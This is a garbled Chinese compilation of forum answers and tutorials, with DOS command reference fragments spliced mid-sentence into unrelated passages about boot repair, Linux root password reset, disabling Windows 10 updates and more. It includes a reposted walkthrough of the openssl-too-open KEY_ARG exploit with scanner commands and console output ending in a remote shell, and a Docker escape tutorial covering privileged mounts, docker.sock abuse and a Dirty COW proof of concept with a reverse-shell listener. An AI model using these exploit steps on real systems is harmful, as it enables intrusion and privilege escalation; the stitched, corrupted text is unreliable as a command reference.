我的电脑刚刚做完系统 然后安装的360杀毒软件 提示有漏洞修复 修复后 开机开不开 出现什么Min
(1)命令后的盘符不可缺省,若对硬盘进行格式化,则会如下列提示:WARNING:ALL DATA ON NON ——2.用nc的方法查找banner得到三个目标内容:apache的版本号,openssl的版本号,作系统版本3.在通过openssl-too-open来进行溢出得到一个shell.REMOVABLE DISK启动后按F8
bash漏洞 shellshock漏洞
bash漏洞 shellshock漏洞
bash漏洞 shellshock漏洞
(7)时,目标文件名也可以与源文件名不相同,称作“异名拷贝”,此时,目标文件名不能省略;
选最近一次正确的模式 或者安全模式
进安全模式后
运行msconfig-BOOT.INI-
把windows xp设为默认即可 或者删除DOS
补丁不兼容,开机按f8恢复到最近一次正确配置、不行就重装,
复位重启之后按F8,看看会出现什么。
怀疑补丁不适合系统,麻烦说下系统版本和大概安装了什么补丁。
这个东西不是很,大不了重置。
你真是高手360你也敢装,从来不装免费娱乐的杀软,。
修复漏洞造成重新开机出问题
如果是普通用户(非 root 用户)忘记密码如果你英文不好的话,只看你键盘上常用的键和屏幕里有这写字眼的词。
3.格式:TREE[盘符:][/F][》PRN]看 Press ESC of recovery 2类型:外部命令menu 这句话,你就按按键盘中的 ESC键,
然后记着看提示 按键 即可。
朋友,按ESC,回到作系统菜单,选择你要进吃作系统,你试试。
关于DOS命令
2.类型:外部命令MD——建立子目录
1.功能:创建新的子目录
2.类型:内部命令
3.格式:MD[盘符:][路径名]〈子目录名〉
4.使用说明:
(1)“盘符”:指定要建立子目录的磁盘驱动器字母,若省略,则为当前驱动器;
(2)“路径名”:要建立的子目录的上级目录名,若缺省则建在当前目录下。
例:(1)在C盘的根目录下创建名为FOX的子目录;(2)在FOX子目录下再创建USER子目录。
C:、>MD FOX (在当前驱动器C盘下创建子目录FOX)
C:、>MD FOX 、USER (在FOX 子目录下再创建USER子目录)
(二)CD——改变当前目录
1.功能:显示当前目录
2.类型:内部命令
3.格式:CD[盘符:][路径名][子目录名]
4.使用说明:
(1)如果省略路径和子目录名则显示当前目录;
(2)如采用“CD、”格式,则退回到根目录;
(3)如采用“CD.。”格式则退回到上一级目录。
例:(1)进入到USER子目录;(2)从USER子目录退回到子目录;(3)返回到根目录。
C:、>CD FOX 、USER(进入FOX子目录下的USER子目录)
C:、FOX、USER>CD.。 (退回上一级根目录)
C:、FOX>CD、 (返回到根目录)
C:、>
(三)RD——删除子目录命令
1.功能:从指定的磁盘删除了目录。
2.类型:内部命令
3.格式:RD[盘符:][路径名][子目录名]
4.使用说明:
(1)子目录在删除前必须是空的,也就是说需要先进入该子目录,使用DEL(删除文件的命令)将其子目录下的文件删空,然后再退回到上一级目录,用RD命令删除该了目录本身;
(2)不能删除根目录和当前目录。
例:要求把C盘FOX子目录下的USER子目录删除,作如下:
步:先将USER子目录下的文件删空;
C、>DEL C:、FOX、USER、。
第二步,删除USER子目录。
C、>RD C:、FOX、USER
(四)DIR——显示磁盘目录命令
2.类型:内部命令
3.格式:DIR [盘符][路径][/P][/W]
/W的使用:加上/W只显示文件名,至于文件大小及建立的日期和时间则都省略。加上参数后,每行可以显示五个文件名。
PATH——路径设置命令
1.功能:设备可执行文件的搜索路径,只对文件有效。
2.类型:内部命令
3.格式:PATH[盘符1]目录[路径名1]{[;盘符2:],〈目录路径名2〉…}
4.使用说明:
(1)当运行一个可执行文件时,DOS会先在当前目录中搜索该文件,若找到则运行之;若找不到该文件,则根据PATH命令所设置的路径,顺序逐条地到目录中搜索该文件;
(2)PATH命令中的路径,若有两条以上,各路径之间以一个分号“;”隔开;
(3)PATH命令有三种使用方法:
PATH[盘符1:][路径1][盘符2:][路径2]…(设定可执行文件的搜索路径)
PATH:(取消所有路径)
PATH:(显示目前所设的路径)
(六)TREE——显示磁盘目录结构命令
1.功能:显示指定驱动器上所有目录路径和这些目录下的所有文件名。
4.使用说明:
(1)使用/F参数时显示所有目录及目录下的所有文件,省略时,只显示目录,不显示目录下的文件;
(七)DELTREE——删除整个目录命令
1.功能:将整个目录及其下属子目录和文件删除。
3.格式:DELTREE[盘符:]〈路径名〉
4.使用说明:该命令可以一步就将目录及其下的所有文件、子目录、更下层的子目录一并删除,而且不管文件的属性为隐藏、系统或只读,只要该文件位于删除的目录之下,DELTREE都一视同仁,照删不误。使用时务必小心!!!
五、磁盘作类命令
1.功能:对磁盘进行格式化,划分磁道和扇区;同时检查出整个磁盘上有无带缺陷的磁道,对坏道加注标记;建立目录区和文件分配表,使磁盘作好接收DOS的准备。
3.格式:FORMAT〈盘符:〉[/S][/4][/Q]
4.使用说明:
DRIVE C:WILL BE LOST !
Proceed with Format (Y/N)?
(:所有数据在C盘上,将会丢失,确实要继续格式化吗?)
(2)若是对软盘进行格式化,则会如下提示:Insert mew diskette for drive A;
and press ENTER when ready…
(在A驱中插入新盘,准备好后按回车键)。
(3)选用[/S]参数,将把DOS系统文件IO.SYS 、MSDOS.SYS及COMMAND.COM到磁盘上,使该磁盘可以做为DOS启动盘。若不选用/S参数,则格式化后的磙盘只能读写信息,而不能做为启动盘;
(4)选用[/4]参数,在1.2MB的高密度软驱中格式化360KB的低密度盘;
(5)选用[/Q]参数,快速格式化,这个参数并不会重新划分磁盘的磁道和扇区,只能将磁盘根目录、文件分配表以及扇区清成空白,因此,格式化的速度较快。
(6)选用[/U]参数,表示无条件格式化,即破坏原来磁盘上所有数据。不加/U,则为安全格式化,这时先建立一个镜象文件保存原来的FAT表和根目录,必要时可用UNFORRMAT恢复原来的数据。
(二)UNFORMAT恢复格式化命令
1.功能:对进行过格式化误作丢失数据的磁盘进行恢复。
3.格式:UNFORMAT〈盘符〉[/L][/U][/P][/TEST]
(1)选用/L参数列出找到的子目录名称、文件名称、大孝日期等信息,但不会真的做FORMAT工作。
(2)选用/P参数将显示于屏幕的报告(包含/L参数所产生的信息)同时也送到打印机。运行时屏幕会显示:“Print out will be sent to LPT1”
(3)选用/TEST参数只做模拟试验(TEST)不做真正的写入动作。使用此参数屏幕会显示:“Simulation only”
(4)选用/U参数不使用MIRROR映像文件的数据,直接根据磁盘现状进行UNFORMAT。
(5)选用/PSRTN;修复硬盘分区表。
若在盘符之后加上/P、/L、/TEST之一,都相当于使用了/U参数,UNFORMAT会“设”此时磁盘没有MIRROR映像文件。
注意:UNFORMAT对于刚FORMAT的磁盘,可以完全恢复,但FORMAT后若做了其它数据的写入,则UNFORMAT就不能完整的救回数据了。UNFORMAT并非是的,由于使用UNFORMAT会重建FAT与根目录,所以它也具有较高的危险性,作不当可能会扩大损失,如果仅误删了几个文件或子目录,只需要利用UNDELETE就够了。
三) CHKDSK——检查磁盘当前状态命令
1.功能:显示磁盘状态、内存状态和指定路径下指定文件的不连续数目。
3.格式:CHKDSK [盘符:][路径][文件名][/F][/V]
4.使用说明:
(2)选[/F]参数,纠正在指定磁盘上发现的逻辑错误;
(3)选用[/V]参数,显示盘上的所有文件和路径。
(四)DISKCOPY——整盘命令
1.功能:格式和内容完全相同的软盘。
3.格式:DISKCOPY[盘符1:][盘符2:]
4.使用说明:
(1)如果目标软盘没有格式化,则时系统自动选进行格式化。
(2)如果目标软盘上原有文件,则后将全部丢失。
(3)如果是单驱动器,系统会提示适时更换源盘和目标盘,请作时注意分清源盘和目标盘。
(五)LABEL——建立磁盘卷标命令
1.功能:建立、更改、删除磁盘卷标。
3.格式:LABEL[盘符:][卷标名]
4.使用说明:
(1)卷标名为要建立的卷标名,若缺省此参数,则系统提示键入卷标名或询问是否删除原有的卷标名;
(2)卷标名由1至11个字符组成。
(六)VOL——显示磁盘卷标命令
1.功能:查看磁盘卷标号。
2.类型:内部命令
3.格式:VOL[盘符:]
4.使用说明:省略盘符,显示当前驱动器卷标。
(七)SCANDISK——检测、修复磁盘命令
1.功能:检测磁盘的FAT表、目录结构、文件系统等是否有问题,并可将检测出的问题加以修复。
3.格式:SCANDISK[盘符1:]{[盘符2:]…}[/ALL]
4.使用说明:
(1)CCANDISK适用于硬盘和软盘,可以一次指定多个磁盘或选用[/ALL]参数指定所有的磁盘;
(2)可自动检测出磁盘中所发生的交叉连接、丢失簇和目录结构等逻辑上的错误,并加以修复。
(八)DEFRAG——重整磁盘命令
1.。功能:整理磁盘,消除磁盘碎块。
3.格式:DEFRAG[盘符:][/F]
4.使用说明:选用/F参数,将文件中存在盘上的碎片消除,并调整磁盘文件的安排,确保文件之间毫无空隙。从而加快读盘速度和节省磁盘空间。
(九)SYS——系统命令
1.功能:将当前驱动器上的DOS系统文件IO.SYS,MSDOS.SYS和COMMAND.COM 传送到指定的驱动器上。
3.格式:SYS[盘符:]
使用说明:如果磁盘剩余空间不足以存放系统文件,则提示:No roomfor on destination disk.
文件作类命令
(一) COPY文件命令
1.功能:拷贝一个或多个文件到指定盘上。
2.类型:内部命令
3.格式:COPY [源盘][路径]〈源文件名〉[目标盘][路径][目标文件名]
4.使用说明:
(1)COPY是文件对文件的方式数据,前目标盘必须已经格式化;
(2)过程中,目标盘上相同文件名称的旧文件会被源文件取代;
(3)文件时,必须先确定目标般有足够的空间,否则会出现;insufficient的错误信息,提示磁盘空间不够;
(4)文件名中允许使用通配举“”“?”,可同时多个文件;
(5)COPY命令中源文件名必须指出,不可以省略。
(6)时,目标文件名可以与源文件名相同,称作“同名拷贝”此时目标文件名可以省略;
(8)时,还可以将几个文件合并为一个文件,称为“合并拷贝”,格式如下:COPY;[源盘][路径]〈源文件名1〉〈源文件名2〉…[目标盘][路径]〈目标文件名〉;
(9)利用COPY命令,还可以从键盘上输入数据建立文件,格式如下:COPY CON [盘符:][路径]〈文件名〉;
(10)注意:COPY命令的使用格式,源文件名与目标文件名之间必须有空格!
(二)XCOPY——目录命令
1.功能:指定的目录和目录下的所有文件连同目录结构。
3.格式:XCOPY [源盘:]〈源路径名〉[目标盘符:][目标路径名][/S][/V][/E]
4.使用说明:
(1)XCOPY是COPY的扩展,可以把指定的目录连文件和目录结构一并拷贝,但不能拷贝隐藏文件和系统文件;
(2)使用时源盘符、源目标路径名、源文件名至少指定一个;
(3)选用/S时对源目录下及其子目录下的所有文件进行COPY。除非指定/E参数,否则/S不会拷贝空目录,若不指定/S参数,则XCOPY只拷贝源目录本身的文件,而不涉及其下的子目录;
(三)TYPE——显示文件内容命令
1.功能:显示ASCII码文件的内容。
2.类型:内部命令。
3.格式:TY2.类型:外部命令PE[盘符:][路径]〈文件名〉
4.使用说明:
(1)显示由ASCII码组成的文本文件,对。EXE.COM等为扩展名的文件,其显示的内容是无法阅读的,没有实际意义2;
(2)该命令一次只可以显示一个文件的内容,不能使用通配符;
(3)如果文件有扩展名,则必须将扩展名写上;
(4)当文件较长,一屏显示不下时,可以按以下格式显示;TYPE[盘符:][路径]〈文件名〉|MORE,MORE为分屏显示命令,使用些参数后当满屏时会暂停,按任意键会继续显示。
(5)若需将文件内容打印出来,可用如下格式:
TYPE[盘符:][路径]〈文件名〉,>PRN
此时,打印机应处于联机状态。
(四) REN——文件改名命令
1.功能:更改文件名称
2.类型:内部命令
3.格式:REN[盘符:][路径]〈旧文件名〉〈新文件名〉
4.使用说明:
(1)新文件名前不可以加上盘符和路径,因为该命令只能对同一盘上的文件更换文件名;
(2)允许使用通配符更改一组文件名或扩展名。
(五)FC——文件比较命令
1.功能:比较文件的异同,并列出异处。
3.格式:FC[盘符:][路径名]〈文件名〉[盘符:][路径名][文件名][/A][/B][/C][/N]
4.使用说明:
(1)选用/A参数,为ASCII码比较模式;
(2)选用/B参数,为二进制比较模式;
(3)选用/C参数,将大小写字符看成是相同的字符。
(4)选用/N参数,在ASCII码比较方式下,显示相异处的行号。
(六)ATTRIB——修改文件属性命令
1.功能:修改指定文件的属性。(文件属性参见2.5.4(二)文件属性一节)
2.类型:外部命令。
3.格式:ATTRIB[文件名][R][——R][A][——A][H][——H][——S]
4.使用说明:
(1)选用R参数,将指定文件设为只读属性,使得该文件只能读取,无法写入数据或删除;选用——R参数,去除只读属性;
(2)选用A参数,将文件设置为档案属(4)选用/V参数时,对的拷贝的扇区都进行较验,但速度会降低。性;选用——A参数,去除档案属性;
(3)选用H参数,将文件调协为隐含属性;选用——H参数,去隐含属性;
(4)选用S参数,将文件设置为系统属性;选用——S参数,去除系统属性;
(5)选用/S参数,对当前目录下的所有子目录及作设置。
七) DEL——删除文件命令
1.功能:删除指定的文件。
2.类型:内部命令
3.格式:DEL[盘符:][路径]〈文件名〉[/P]
4.使用说明:
(1)选用/P参数,系统在删除前询问是否真要删除该文件,若不使用这个参数,则自动删除;
(2)该命令不能删除属性为隐含或只读的文件;
(3)在文件名称中可以使用通配符;
(4)若要删除磁盘上的所有文件(DEL·或DEL·),则会提示:(Arey ou sure?)(你确定吗?)若回答Y,则进行删除,回答N,则取消此次删除作业。
(八) UNDELETE——恢复删除命令
1.功能:恢复被误删除命令
2.类型:外部命令。
3.格式:UNDELETE[盘符:][路径名]〈文件名〉[/DOS]/LIST][/ALL]
4.使用说明:使用UNDELETE可以使用“”和“?”通配符。
(1)选用/DOS参数根据目录里残留的记录来恢复文件。由于文件被删除时,目录所记载斩文件名个字符会被改为E5,DOS即依据文件开头的E5和其后续的字符来找到欲恢复的文件,所以,UNDELETE会要求用户输入一个字符,以便将文件名字补齐。但此字符不必和原来的一样,只需符合DOS的文件名规则即可。
(2)选用/LIST只“列出”符合指定条件的文件而不做恢复,所以对磁盘内容完全不会有影响。
(3)选用/ALL自动将可完全恢复的文件完全恢复,而不一一地询问用户,使用此参数时,若UNDELTE利用目录里残留的记录来将文件恢复,则会自动选一个字符将文件名补齐,并且使其不与现存文件名相同,选用字符的优选顺序为:#%——0000123456789A~Z。
UNDELETE还具有建立文件的防护措施的功能,已超出本课程授课范围,请读者在使用些功能时查阅有关DOS手册。
七、其它命令
(一)CLS——清屏幕命令
1功能:清除屏幕上的所有显示,光标置于屏幕左上角。
3格式:CLS
(二) VER查看系统版本号命令
1功能:显示当前系统版本号
3格式:VER
(三) DATA日期设置命令
1功能:设置或显示系统日期。
3格式:DATE[mm——dd——yy]
4使用说明:
(2)当机器开始启动时,有自动处理文件(AUTOEXEC.BAT)被执行,则系统不提示输入系统日期。否则,提示输入新日期和时间。
(四) TIME系统时钟设置命令
1功能:设置或显示系统时期。
3格式:TIME[hh:mm:ss:xx]
4使用说明:
(1)省略[hh:mm:ss:xx],显示系统时间并提示输入新的时间,不修改则可直接按回车键,[hh:mm:ss:xx]为“小时:分钟:秒:百分之几秒”格式;
(2)当机器开始启动时,有自动处理文件(AUTOEXEC.BAT)被执行,则系统不提示输入系统日期。否则,提示输入新日期和时间。
(五)MEM查看当前内存状况命令
1功能:显示当前内存使用的情况
3格式:MEM[/C][/F][/M][/P]
4使用说明:
(1)选用/C参数列出装入常规内存和CMB的各文件的长度,同时也显示内存空间的使用状况和的可用空间;
(2)选用/F参数分别列出当前常规内存剩余的字节大小和UMB可用的区域及大小;
(3)选用/M参数显示该模块使用内存地地址、大小及模块性质;
(4)选用/P参数指定当输出超过一屏时,暂停供用户查看。
(六) MSD显示系统信息命令
1功能:显示系统的硬件和作系统的状况。
3格式:MSD[/I][/B][/S]
4使用说明:
(1)选用/I参数时,不检测硬件;
(2)选用/B参数时,以黑白方式启动MSD;
(3)选用/S参数时,显示出简明的系统报告。
千个常用DOS命令全面收藏
帮助文件夹下无此文件,直接输入net,回车试试
应该找不回了!这是不是设置权限之类的!不同盘子的系统用户对不上!可能打不开!装会原来那系统可能就能打开了!
楼主您没说那个加密的文件是打不开了还找不回了。。。
不是设置了权限还是用哪个md
..的???
请问你当初是怎么创建的?
出错提示?贴图上来。
我感觉很难找回了
在linux中忘记用户的密码怎么办
4. 使用说明:/P的使用;当欲查看的目录太多,无法在一屏显示完屏幕会一直往上卷,不容易看清,加上/P参数后,屏幕上会分面一次显示23行的文件信息,然后暂停,并提示;Press any key to continue这个不是什么大问题,因为 root 可以修改任何人的密码。举个例子(要求 root 用户)
很多时候我们会遇到遭受cc或syn等攻击,如果发现自己的网站访问异常缓慢且流量异常。可以使用系统内置netstat命令简单判断一下是否被攻击。常用的netstat命令该命令将显示所有活动的网络连接。passwd barbara
按回车键后,将提示输入用户 barbara 的新密码(root 用户不需要知道旧的密码)。如果一个普通用户想要修改自己的密码,该用户会被要求输入旧的密码(这是一个安全特性,以避免当你离开你的坐位有人试图修改你的密码)。
如果是超级用户
问题会复杂些,那么有如下两种解决方案:
种办法
最容易解决“忘记密码问题”的方法是将 Linux 重新启动到单用户模式,可以在“lilo”的命令提示符下输入:
linux single
这种办法将使你变成 root 超级用户而不需要输入任何密码。现在作为 root 用户,你可以使用以下命令重新设置密码(不需要输入旧的密码)
pas4.使用说明:用于将被“非破坏性”格式化的磁盘恢复。根目录下被删除的文件或子目录及磁盘的系统扇区(包括FAT、根目录、BOOT扇区及硬盘分区表)受损时,也可以用UNFORMAT来抢救。swd
你可能觉得这实在是太不安全了!那是因为,如果有人可以物理上“访问”你的计算机硬件,没有计算机系统是安全的。但是,我并不喜欢在我的计算机上有这个“linux single”的漏洞存在,所以我在文件/etc/lilo.conf里(在“image=”段落的尾部)加上以下内容就可以把这个漏洞拔除:
password=”my_password”
restricted
这个设置使得 Linux 启动时,在 lilo 的命令提示符下,当用户输入 linux 带任何参数时必须输入正确的密码。如果用户不是使用命令行的启动模式而使用正常的启动模式,没有密码也能够启动系统。为了让修改生效,必须重新运行 lilo 命令。因为我设置的密码在 lilo.conf 文件里没有加密,我还必须把文件 /etc/lilo.conf 改成只有 root 用户可以读写:
chmod 600 /etc/lilo.conf
Cent OS8.0版本的LINUX忘了ROOT密码,视频教程
如何用程序扫描openssl漏洞主机
(1)省略[mm——dd——yy]显示系统日期并提示输入新的日期,不修改则可直接按回车键,[mm——dd——yy]为“月月——日日——年年”格式;apache_openssl漏洞的利用及权限的提升
apache_openssl漏洞的利用及权限的提升
--nightcat
转载请保持文章完整
部分:获得shell.
在packetstorm玩了一段时间,遇到有openssl-too-open.tar.gz这个exploit.
现在看看软件包的描述:
OpenSSL v0.9.6d and below remote exploit for Apache/mod_ssl servers which takes aantage of the KEY_ARG overflow. Tested against most major Linux distributions. Gives a remote nobody shell on Apache and remote root on other servers. Includes an OpenSSL vulnerability scanner which is more reliable than the RUS-CERT scanner and a detailed vulnerability ysis
这个描述说明这个exploit 是openssl v 0.9.6的key_arg的漏洞来达到溢出的目的。不过也要
注意apache/mod_ssl的版本信息。对于大多数的有这样条件的都能溢出成功。取得一个id是
nobody shell,有些甚至是root的权限。软件包里面有一个扫描器,exploit。
好象听起来很诱人,down回来研究一下。
nightcat@nightcat$tar -zxvf openssl-too-open.tar.gz
nightcat@nightcat$cd openssl-too-open
Makefile README linux-x86.c main.c main.h scanner.c ssl2.c ssl2.h
习惯性的要读一下软件包的REAMDE文件。
nightcat@nightcat$ more README
得到一些有用的信息:
1.编译的方法:
直接make就可以,之后就可以得到openssl-too-open和openssl-scanner
2.openssl-too-open的用法:
Usage: ./openssl-too-open [options]
-a
-p
SSL port (default is 443)
-c
-m
-v verbose mode
Supported architectures:
0x00 - Gentoo (apache-1.3.24-r2)
0x01 - Debian Woody GNU/Linux 3.0 (apache-1.3.26-1)
0x02 - Slackware 7.0 (apache-1.3.26)
0x03 - Slackware 8.1-stable (apache-1.3.26)
0x04 - RedHat Linux 6.0 (apache-1.3.6-7)
0x05 - RedHat Linux 6.1 (apache-1.3.9-4)
0x06 - RedHat Linux 6.2 (apache-1.3.12-2)
0x07 - RedHat Linux 7.0 (apache-1.3.12-25)
0x08 - RedHat Linux 7.1 (apache-1.3.19-5)
0x09 - RedHat Linux 7.2 (apache-1.3.20-16)
0x0a - Redhat Linux 7.2 (apache-1.3.26 w/PHP)
0x0b - RedHat Linux 7.3 (apache-1.3.23-11)
0x0c - SuSE Linux 7.0 (apache-1.3.12)
0x0d - SuSE Linux 7.1 (apache-1.3.17)
0x0e - SuSE Linux 7.2 (aUsage: ./openssl-scanner [options]
0x0f - SuSE Linux 7.3 (apache-1.3.20)
0x10 - SuSE Linux 8.0 (apache-1.3.23-137)
0x11 - SuSE Linux 8.0 (apache-1.3.23)
0x12 - Mandrake Linux 7.1 (apache-1.3.14-2)
0x13 - Mandrake Linux 8.0 (apache-1.3.19-3)
0x14 - Mandrake Linux 8.1 (apache-1.3.20-3)
0x15 - Mandrake Linux 8.2 (apache-1.3.23-4)
/想成功,就要看准系统类型和apache版本号
如果是 0x07 - RedHat Linux 7.0 (apache-1.3.12-25):
./epenssl-too-open -a 0x07 ip .就应该可以啦!
/
3.openssl-scanner的用法:
-i
-o
-a append to output log (requires -o)
-b check for big endian servers
-C scan the entire class C network the host belogs to
-d debug mode
-w N connection timeout in seconds
Examples: ./openssl-scanner -d 192.168.0.1
./openssl-scanner -i hosts -o my.log -w 5
./openssl-scanner -C 192.168.0.0
/扫描一个c类的ip
./openssl-scanner -C 192.168.0.0
/
4.一个实现例子:
$ ./openssl-scanner -C 192.168.0.0
: openssl-scanner : OpenSSL vulnerability scanner
by Solar Eclipse
Opening 255 connections . . . . . . . . . . done
Waiting for all connections to finish . . . . . . . . . . . done
192.168.0.136: Vulnerable
$ nc 192.168.0.1 80
HEAD / HTTP/1.0
HTTP/1.1 200 OK
Date: Tue, 17 Sep 2002 17:47:44 GMT
: Apache-AancedExtranet/1.3.20 (Mandrake Linux/3mdk) mod_ssl/2.8.4 OpenSSL/0.9.6b
Connection: close
Content-Type: text/html
./openssl-too-open -a 0x14 192.168.0.1
: openssl-too-open : OpenSSL remote exploit
by Solar Eclipse
: Opening 30 connections
Establishing SSL co(2)选用>PRN参数时,则把所列目录及目录中的文件名打印输出。nnections
: Using the OpenSSL leak to retri the addresses
ssl0 : 0x810b3a0
ssl1 : 0x810b360
ssl2 : 0x810b4e0
Addresses don't match.
: Opening 40 connections
Establishing SSL connections
: Using the OpenSSL leak to retri the addresses
ssl0 : 0x8103830
ssl1 : 0x80fd668
ssl2 : 0x80fd668
Addresses don't match.
: Opening 50 connections
Establishing SSL connections
: Using the OpenSSL leak to retri the addresses
ssl0 : 0x8103830
ssl1 : 0x8103830
ssl2 : 0x8103830
: Sending shellcode
Reading tag
Execution of stage1 shellcode succeeded, sending stage2
Spawning shell...
bash: no job control in this shell
bash-2.05$
bash-2.05$ uname -a; id; w;
Linux localhost.localdomain 2.4.8-26mdk #1 Sun Sep 23 17:06:39 CEST 2001 i686 unknown
uid=48(apache) gid=48(apache) groups=48(apache)
1:49pm up 4:26, 1 user, load erage: 0.04, 0.07, 0.07
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
bash-2.05$
整个README 文件已经说的很明白了:
现在是总结一下实现的过程:
1.通过openssl-scanner来扫描一个c段的ip,找到有漏洞的主机,
windows10安全更新,怎么取消
1.功能:显示磁盘目录的内容。方法一:
按WIN+R 打开运行,输入 servs.msc 回车 然后找到 “Windows updata”服务,双击后设置为禁用 应用即可;
方法二:推迟自动更新
微软在win10系统中Windows更新处虽然没有提供关闭1、按“Win+R”组合键打开运行输入“gpedit.msc”再点“确定”;自动更新的选项,不过却提供了延迟更新的选项;
作步骤:打开win10系统的Windows更新,点击高级选项,勾选“推迟升级”选项即可;
方法三:为windows更新指定一个错误的升级地址
2、打开“本地组策略编辑2.类型:外部命令器”展开“管理模版”→“Windows组件”;
3、接着双击“Windows组件”找到“Windows Update;
4、在“Windows Update”内找到“指定Intranet Microsoft更新服务位置”;
5、选中“指定Intranet Microsoft更新服务位置”右键编辑;
6、将“未配置”框选为“已启用”。在“设置检测更新的Intranet更新服务”填写127.0.0.1 (注:127.0.0.1为本机IP)。
PS:新的Windows系统,要求用户接受每一次更新。“Windows 10家庭版”用户完全无法逃避更新;“Windows10专业版”用户有8个月的时间来推迟安装更新,但同样无法拒绝;只有“Windows 10企业版”高级用户才能无限期推迟更新。
Windows 10是微软开发的作系统,该系统的技术预览版于时间2014年10月1日发布。2015年1月22日,微软正式发布Windows 10,主推跨平台融合。2015年5月14日,微软正式公布Window 10家族阵容,一共包含七大版本;6月,微软宣布,Windows 10于2015年7月29日面向190个发布,家庭版119美元,专业版199美元;7月9日,微软针对测试者再一次升级Windows 10版本,新增加一个软件“微软Wi-Fi”;7月29日,Win10推送全面开启,Win7、Win8用户从零点起就可以免费升级到Win10;12月6日,微软宣布,于2018年9月1日停止为Windows 10移动版提供技术支持。截止2016年2月,Windows 10全球市场份额超越了Windows XP,成为了全球第二大桌面作系统。2016年4月7日,微软发布了支持原生Linux bash命令行的Windows 10内部预览版。
win10关闭自动更新有三个解决方法:
方法一:
按WIN+R 打开运行,输入 servs.msc 回车 然后找到 “Windows updata”服务,双击后设置为禁用 应用即可;
方法二:推迟自动更新
微软在win10系统中Windows更新处虽然没有提供关闭自动更新的选项,不过却提供了延迟更新的选项;
作步骤:打开win10系统的Windows更新,点击高级选项,勾选“推迟升级”选项即可;
方法三:为windows更新指定一个错误的升级地址
2、打开“本地组策略编辑器”展开“管理模版”→“Windows组件”;
3、接着双击“Windows组件”找到“Windows Update;
4、在“Windows Update”内找到“指定Intranet Microsoft更新服务位置”;
5、选中“指定Intranet Microsoft更新服务位置”右键编辑;
6、将“未配置”框选为“已启用”。在“设置检测更新的Intranet更新服务”填写127.0.0.1 (注:127.0.0.1为本机IP)。
PS:新的Windows系统,要求用户接受每一次更新。“Windows 10家庭版”用户完全无法逃避更新;“Windows10专业版”用户有8个月的时间来推迟安装更新,但同样无法拒绝;只有“Windows 10企业版”高级用户才能无限期推迟更新。
干货来啦!带你初探Docker逃逸
Docker 是当今使用范围最广的开源容器技术之一,具有高效易用的优点。然而如果使用Docker时采取不当安全策略,则可能 导致系统面临安全威胁。
本期安仔课堂,ISEC实验室的张老师 将为大家介绍不同环境下, Docker逃逸至外部宿主机的情况。
一、配置特权模式时的逃逸情况
1.--privileged(特权模式)
特权模式于版本0.6时被引入Docker,允许容器内的root拥有外部物理机root权限,而此前容器内root用户仅拥有外部物理机普通用户权限。
使用特权模式启动容器, 可以获取大量设备文件访问权限 。因为当执行docker run —privileged时,Docker容器将被允许访问主机上的所有设备,并可以执行mount命令进行挂载。
当控制使用特权模式启(1)选用[文件名]参数,则显示该文件占用磁盘的情况;动的容器时,docker可通过mount命令将外部宿主机磁盘设备挂载进容器内部, 获取对整个宿主机的文件读写权限 ,此外还可以 通过写入任务等方式在宿主机执行命令 。
具体步骤如下:
1.以特权模式运行一个容器:docker run -it --privileged ubuntu:14.04 /bin/bash
3.此时查看/dev/路径会发现很多设备文件:ls /dev
4.新建目录以备挂载:mkdir /abc
5.将/dev/sda1挂载至 /abc: mount /dev/sda1 /abc
6.最终我们可以通过访问容器内部的/abc路径来达到访问整个宿主机的目的:ls /abc
7.尝试写文件到宿主机:echo 123 > /abc/home/botasky/escape2
8.查看宿主机中的文件:ls /home/botasky/escape2
2.--cap-add与SYS_
Linux内核自版本2.2起引入功能(capabilities)机制,打破了UNIX/LINUX作系统中超级用户与普通用户的概念, 允许普通用户执行超级用户权限方能运行的命令 。
截至Linux 3.0版本,Linux有 38种capabilities。Docker容器默认限制为14个capabilities ,可以使用--cap-add和--cap-drop选项 为容器配置capabilities 。
当容器使用特权模式启动时,将被赋予所有capabilities。此外,在--cap-add的诸多选项中,SYS意为container进程允许执行mount、umount等一系列系统管理作,因此当容器以--cap-add=SYS启动时,也将面临威胁。
二、挂载配置不当时的逃逸情况
1.危险的Docker.sock
众所周知,Docker采用C/S架构,我们平常使用的Docker命令中,docker即为client,端的角色由docker daemon扮演,二者之间 通信方式有以下3种:
其中 使用docker.sock进行通信为默认方式 ,当容器中进程需在生产过程中与Docker守护进程通信时,容器本身需要挂载/var/run/docker.sock文件。
本质上而言,能够访问docker socket 或连接HTTPS API的进程可以 执行Docker服务能够运行的任意命令 ,以root权限运行的Docker服务通常可以 访问整个主机系统 。
因此,当容器访问docker socket时,我们可 通过与docker daemon的通信对其进行恶意纵完成逃逸 。若容器A可以访问docker socket,我们便可在其内部安装client(docker),通过docker.sock与宿主机的server(docker daemon)进行交互,运行并切换至不安全的容器B,最终在容器B中控制宿主机。
具体步骤如下:
1.运行一个挂载/var/run/的容器:docker run -it -v /var/run/:/host/var/run/ ubuntu:14.04 /bin/bash
2.在2类型:内部命令容器内安装Docker作为client(此步骤可能需要更换源):apt-get install docker.io
3.查看宿主机Docker信息:docker -H unix:///host/var/run/docker.sock
4.运行一个新容器并挂载宿主机根路径:docker -H unix:///host/var/run/docker.sock run -v /:/aa -it ubuntu:14.04 /bin/bash
可以看见@符号后的Docker ID已经发生变化:
5.在新容器/aa路径下完成对宿主机资源的访问:ls /aa
三、存在Dirty Cow漏洞时的逃逸情况
1.牛漏洞(CVE-2016-5195)与VDSO(虚拟动态共享对象)
Dirty Cow(CVE-2016-5195)是Linux内核中的权限提升漏洞,源于Linux内核的内存子系统在处理写入时拷贝(copy-on-write, Cow)存在竞争条件(race condition),允许恶意用户提权获取其他只读内存映射的写访问权限。
竞争条件 意为任务执行顺序异常,可能 导致应用崩溃或面临攻击者的代码执行威胁 。利用该漏洞,攻击者可在其目标系统内提升权限,甚至 获得root权限 。 VDSO 就是Virtual Dynamic Shared Object(虚拟动态共享对象),即内核提供的虚拟.so。该.so文件位于内核而非磁盘,程序启动时,内核把包含某.so的内存页映射入其内存空间,对应程序就可作为普通.so使用其中的函数。
2.PoC&验证环境
GitHub上已有人提供了测试环境与PoC,我们可以通过以下命令获取。
1. 运行验证容器:docker-come run 2.查看磁盘文件:fdisk -ldirtycow /bin/bash
2. 本地开启nc,进行观察(PoC中设置的反弹地址为本地的1234端口):nc -lvp 1234
3. 编译PoC并运行,等待shell反弹:make &./0xdeadbeef
通过ID命令,可以发现这个shell为root权限:
参考&引用
Linux是否被攻击怎么判断
